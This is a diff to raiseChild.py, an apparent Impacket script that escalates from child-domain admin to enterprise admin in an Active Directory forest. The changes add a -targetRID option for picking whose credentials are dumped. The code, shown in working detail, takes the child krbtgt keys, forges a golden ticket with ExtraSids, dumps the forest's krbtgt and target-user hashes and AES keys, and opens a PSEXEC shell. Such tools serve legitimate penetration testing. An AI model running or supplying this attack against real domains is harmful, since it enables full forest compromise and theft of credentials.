@@ -19,7 +19,10 @@
 #           1) child-domain Admin credentials (password, hashes or aesKey) in the form of 'domain/username[:password]'
 #              The domain specified MUST be the domain FQDN.
 #           2) Optionally a pathname to save the generated golden ticket (-w switch)
-#           3) Optionally a target to PSEXEC with Enterprise Admin privieleges to (-target-exec switch)
+#           3) Optionally a target-user RID to get credentials (-targetRID switch)
+#              Administrator by default.
+#           4) Optionally a target to PSEXEC with the target-user privileges to (-target-exec switch).
+#              Enterprise Admin by default.
 #
 #       Process:
 #           1) Find out where the child domain controller is located and get its info (via [MS-NRPC])
@@ -28,14 +31,15 @@
 #           4) Get the child domain's krbtgt credentials (via [MS-DRSR])
 #           5) Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array
 #              and setting expiration 10 years from now
-#           6) Use the generated ticket to log into the forest and get the krbtgt/admin info
+#           6) Use the generated ticket to log into the forest and get the target user info (krbtgt/admin by default)
 #           7) If file was specified, save the golden ticket in ccache format
 #           8) If target was specified, a PSEXEC shell is launched
 #
 #       Output:
-#           1) Forest's krbtgt/admin credentials
+#           1) Target user credentials (Forest's krbtgt/admin credentials by default)
 #           2) A golden ticket saved in ccache for future fun and profit
-#           3) PSExec Shell with Enterprise Admin privileges at target-exec parameter.
+#           3) PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec
+#              parameter.
 #
 #   IMPORTANT NOTE: Your machine MUST be able to resolve all the domains from the child domain up to the
 #                   forest. Easiest way to do is by adding the forest's DNS to your resolv.conf or similar
@@ -450,6 +454,7 @@ class RemoteStdInPipe(Pipes):
 class RAISECHILD:
     def __init__(self, target = None, username = '', password = '', domain='', options = None, command=''):
         self.__rid = 0
+        self.__targetRID = options.targetRID
         self.__target = target
         self.__kdcHost = None
         self.__command = command
@@ -563,7 +568,7 @@ class RAISECHILD:
             s.logoff()
         return s.getServerName() + '.' + s.getServerDNSDomainName()
 
-    def getParentSidAndAdminName(self, parentDC, creds):
+    def getParentSidAndTargetName(self, parentDC, creds, targetRID):
         if self.__doKerberos is True:
             # In Kerberos we need the target's name
             machineNameOrIp = self.getDNSMachineName(gethostbyname(parentDC))
@@ -594,11 +599,11 @@ class RAISECHILD:
 
         # Now that we have the Sid, let's get the Administrator's account name
         sids = list()
-        sids.append(domainSid+'-500')
+        sids.append(domainSid+'-'+targetRID)
         resp = hLsarLookupSids(dce, policyHandle, sids, LSAP_LOOKUP_LEVEL.LsapLookupWksta)
-        adminName = resp['TranslatedNames']['Names'][0]['Name']
+        targetName = resp['TranslatedNames']['Names'][0]['Name']
 
-        return domainSid, adminName
+        return domainSid, targetName
 
     def __connectDrds(self, domainName, creds):
         if self.__doKerberos is True or creds['TGT'] is not None:
@@ -1077,7 +1082,7 @@ class RAISECHILD:
         logging.info('Raising %s to %s' % (childName, parentName))
 
         # 3) Get the parents's Enterprise Admin SID (via [MS-LSAT])
-        entepriseSid, adminName = self.getParentSidAndAdminName(parentName, childCreds)
+        entepriseSid, targetName = self.getParentSidAndTargetName(parentName, childCreds, self.__targetRID)
         logging.info('%s Enterprise Admin SID is: %s-519' % (parentName,entepriseSid))
 
         # 4) Get the child domain's krbtgt credentials (via [MS-DRSR])
@@ -1103,7 +1108,7 @@ class RAISECHILD:
                     # Windows XP). So, if that's the case we'll force using RC4 by converting
                     # the password to lm/nt hashes and hope for the best. If that's already
                     # done, byebye.
-                    if childCreds['lmhash'] is '' and childCreds['nthash'] is '':
+                    if childCreds['lmhash'] == '' and childCreds['nthash'] == '':
                         from impacket.ntlm import compute_lmhash, compute_nthash
                         childCreds['lmhash'] = compute_lmhash(childCreds['password'])
                         childCreds['nthash'] = compute_nthash(childCreds['password'])
@@ -1144,7 +1149,7 @@ class RAISECHILD:
                     # Windows XP). So, if that's the case we'll force using RC4 by converting
                     # the password to lm/nt hashes and hope for the best. If that's already
                     # done, byebye.
-                    if childCreds['lmhash'] is '' and childCreds['nthash'] is '':
+                    if childCreds['lmhash'] == '' and childCreds['nthash'] == '':
                         from impacket.ntlm import compute_lmhash, compute_nthash
                         childCreds['lmhash'] = compute_lmhash(childCreds['password'])
                         childCreds['nthash'] = compute_nthash(childCreds['password'])
@@ -1154,6 +1159,7 @@ class RAISECHILD:
                     raise
 
         # 6) Use the generated ticket to log into the parent and get the krbtgt/admin info
+        # 6) Use the generated ticket to log into the parent and get the target-user info
         logging.info('Getting credentials for %s' % parentName)
         targetUser = 'krbtgt'
         childCreds['TGT'] = TGT
@@ -1162,21 +1168,22 @@ class RAISECHILD:
         parentName, targetUser, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
         print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (parentName, targetUser, credentials['aesKey'].decode("utf-8")))
 
-        logging.info('Administrator account name is %s' % adminName)
-        rid, credentials = self.getCredentials(adminName, parentName, childCreds)
-        print('%s/%s:%s:%s:%s:::' % (parentName, adminName, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
-        print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (parentName, adminName, credentials['aesKey'].decode('utf-8')))
+        ################ Get TargetUser credentials (Administrator credentials by default)
+        logging.info('Target User account name is %s' % targetName)
+        rid, credentials = self.getCredentials(targetName, parentName, childCreds)
+        print('%s/%s:%s:%s:%s:::' % (parentName, targetName, rid, credentials['lmhash'].decode('utf-8'), credentials['nthash'].decode('utf-8')))
+        print('%s/%s:aes256-cts-hmac-sha1-96s:%s' % (parentName, targetName, credentials['aesKey'].decode('utf-8')))
 
-        adminCreds = {}
-        adminCreds['username'] = adminName
-        adminCreds['password'] = ''
-        adminCreds['domain'] = parentName
-        adminCreds['lmhash'] = credentials['lmhash']
-        adminCreds['nthash'] = credentials['nthash']
-        adminCreds['aesKey'] = credentials['aesKey']
-        adminCreds['TGT'] =  None
-        adminCreds['TGS'] =  None
-        return adminCreds, TGT, TGS
+        targetCreds = {}
+        targetCreds['username'] = targetName
+        targetCreds['password'] = ''
+        targetCreds['domain'] = parentName
+        targetCreds['lmhash'] = credentials['lmhash']
+        targetCreds['nthash'] = credentials['nthash']
+        targetCreds['aesKey'] = credentials['aesKey']
+        targetCreds['TGT'] =  None
+        targetCreds['TGS'] =  None
+        return targetCreds, TGT, TGS
 
     def exploit(self):
         # 1) Find out where the child domain controller is located and get its info (via [MS-NRPC])
@@ -1188,7 +1195,7 @@ class RAISECHILD:
         logging.info('Forest FQDN is: %s' % forestName)
 
         # Let's raise up our child!
-        adminCreds, parentTGT, parentTGS = self.raiseUp(childName, childCreds, forestName)
+        targetCreds, parentTGT, parentTGS = self.raiseUp(childName, childCreds, forestName)
 
         # 7) If file was specified, save the golden ticket in ccache format
         if self.__writeTGT is not None:
@@ -1203,16 +1210,14 @@ class RAISECHILD:
             logging.info('Opening PSEXEC shell at %s' % self.__target)
             from impacket.smbconnection import SMBConnection
             s = SMBConnection('*SMBSERVER', self.__target)
-            s.kerberosLogin(adminCreds['username'], '', adminCreds['domain'], adminCreds['lmhash'],
-                            adminCreds['nthash'], useCache=False)
+            s.kerberosLogin(targetCreds['username'], '', targetCreds['domain'], targetCreds['lmhash'],
+                            targetCreds['nthash'], useCache=False)
 
             if self.__command != 'None':
-                executer = PSEXEC(self.__command, adminCreds['username'], adminCreds['domain'], s, None, None)
+                executer = PSEXEC(self.__command, targetCreds['username'], targetCreds['domain'], s, None, None)
                 executer.run(self.__target)
 
 if __name__ == '__main__':
-    # Init the example's logger theme
-    logger.init()
 
     print(version.BANNER)
 
@@ -1220,12 +1225,15 @@ if __name__ == '__main__':
                                                                     "forest")
 
     parser.add_argument('target', action='store', help='domain/username[:password]')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
     parser.add_argument('-w', action='store',metavar = "pathname",  help='writes the golden ticket in CCache format '
                                                                          'into the <pathname> file')
     #parser.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller (needed to get the user''s SID). If omitted it will use the domain part (FQDN) specified in the target parameter')
     parser.add_argument('-target-exec', action='store',metavar = "target address",  help='Target host you want to PSEXEC '
                         'against once the main attack finished')
+    parser.add_argument('-targetRID', action='store', metavar = "RID", default='500', help='Target user RID you want to '
+                        'dump credentials. Administrator (500) by default.')
 
     group = parser.add_argument_group('authentication')
 
@@ -1248,12 +1256,17 @@ if __name__ == '__main__':
 
         print("\tThis will perform the attack and then psexec against target-exec as Enterprise Admin")
         print("\tpython raiseChild.py -target-exec targetHost childDomainn.net/adminuser\n")
+        print("\tThis will perform the attack and then psexec against target-exec as User with RID 1101")
+        print("\tpython raiseChild.py -target-exec targetHost -targetRID 1101 childDomainn.net/adminuser\n")
         print("\tThis will save the final goldenTicket generated in the ccache target file")
         print("\tpython raiseChild.py -w ccache childDomain.net/adminuser\n")
         sys.exit(1)
  
     options = parser.parse_args()
 
+    # Init the example's logger theme
+    logger.init(options.ts)
+
     import re
     # This is because I'm lazy with regex
     # ToDo: We need to change the regex to fullfil domain/username[:password]
@@ -1268,10 +1281,12 @@ if __name__ == '__main__':
 
     if options.debug is True:
         logging.getLogger().setLevel(logging.DEBUG)
+        # Print the Library's installation path
+        logging.debug(version.getInstallationPath())
     else:
         logging.getLogger().setLevel(logging.INFO)
 
-    if domain is '':
+    if domain == '':
         logging.critical('Domain should be specified!')
         sys.exit(1)
 
@@ -1294,3 +1309,6 @@ if __name__ == '__main__':
     except Exception as e:
         logging.debug('Exception:', exc_info=True)
         logging.critical(str(e))
+        if hasattr(e, 'error_code'):
+            if e.error_code == 0xc0000073:
+                logging.info("Account not found in domain. (RID:%s)", options.targetRID)
\ No newline at end of file
